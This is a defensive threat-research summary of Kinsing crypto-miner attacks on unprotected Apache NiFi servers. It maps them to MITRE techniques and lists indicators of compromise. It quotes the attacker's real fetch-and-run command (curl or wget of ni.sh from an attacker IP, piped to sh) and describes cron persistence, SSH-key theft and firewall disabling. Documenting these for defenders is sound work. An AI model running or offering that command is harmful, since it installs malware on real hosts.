Threat Research

Your Business Data and Machine Learning at Risk: Attacks Against Apache NiFi

Securonix

Attackers are actively scanning for unprotected Apache NiFi instances and add a malicious processor to NiFi to install a crypto miner, while also attempting lateral movement via SSH keys. Persistence is achieved through cron-based re-downloads, and scripts run in memory rather than being saved to disk; strong defense includes not exposing NiFi to the internet and following NiFi’s password practices. #ApacheNiFi #Kinsing #Aliyun

Keypoints

  • Active Internet scanning targets unprotected Apache NiFi deployments.
  • Attack #1 adds a NiFi processor to download and run a crypto miner from a remote server.
  • The miner runs via a scheduled NiFi processor, with the script executed in memory (not saved to disk).

MITRE Techniques

  • [T1046] Network Service Discovery – The actor scans the Internet for unprotected NiFi instances. Quote: ‘At least one actor is actively scanning the Internet for unprotected instances of Apache NiFi.’
  • [T1059.004] Unix Shell – The attack uses a bash-based command to fetch and execute a script. Quote: ‘”Command”: “bash”, “Command Arguments”: “-c “(curl -s 194.38.20.32/ni.sh||wget -q -O- 194.38.20.32/ni.sh)|sh”‘
  • [T1105] Ingress Tool Transfer – The downloaded script pulls the crypto miner from a remote server. Quote: ‘The script downloads the crypto coin minder from http://194.38.20.32/kinsing.’
  • [T1496] Resource Hijacking – Crypto miner is installed and run on the NiFi host. Quote: ‘The crypto coin miner isn’t remarkable; other than that, it isn’t xmrig. Kinsing is written in Go…’
  • [T1053] Scheduled Task/Job – Persistence via cron to re-download and run ni.sh every minute. Quote: ‘A cron job is added to re-download and run ni.sh every minute. This cron job will run as the current user running NiFi.’
  • [T1021.004] SSH – Lateral Movement – The attacker collects SSH keys and attempts to connect to other hosts using those keys. Quote: ‘It collects SSH keys from the victim’s home directory… It will try to connect to all hosts using the key files it found.’
  • [T1071.001] Web Protocols – C2 traffic over HTTP(S) to fetch commands and report back. Quote: ‘GET /mg HTTP/1.1…’ (example of C2 traffic).
  • [T1562.001] Impair Defenses – The malware disables the firewall as part of its actions. Quote: ‘It disables the firewall.’

Indicators of Compromise

  • [IP Address] context – scanning/source IPs observed: 109.237.96.124, 109.207.200.43, and other related addresses (e.g., 31.184.240.34/x, 93.189.46.81/h2)
  • [Domain] context – external lookups used by attacker tools: icanhazip.com (victim public IP lookup) and Alibaba-related domains like update.aegis.aliyun.com
  • [URL] context – malicious fetches: http://194.38.20.32/ni.sh, http://194.38.20.32/kinsing, http://194.38.20.32/spre.sh, http://194.38.20.32/spr.sh
  • [File Hash] context – hashes of downloaded/constructed malicious files: f0514bd8eb232f7314e230dc314a4e90572b8ed63dbcc9c55814b4dae8697206, 5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d (and 6 more hashes)
  • [File Name] context – notable file names observed in artifacts: ni.sh, kinsing, spr.sh, spre.sh

Read more: https://isc.sans.edu/diary/rss/29900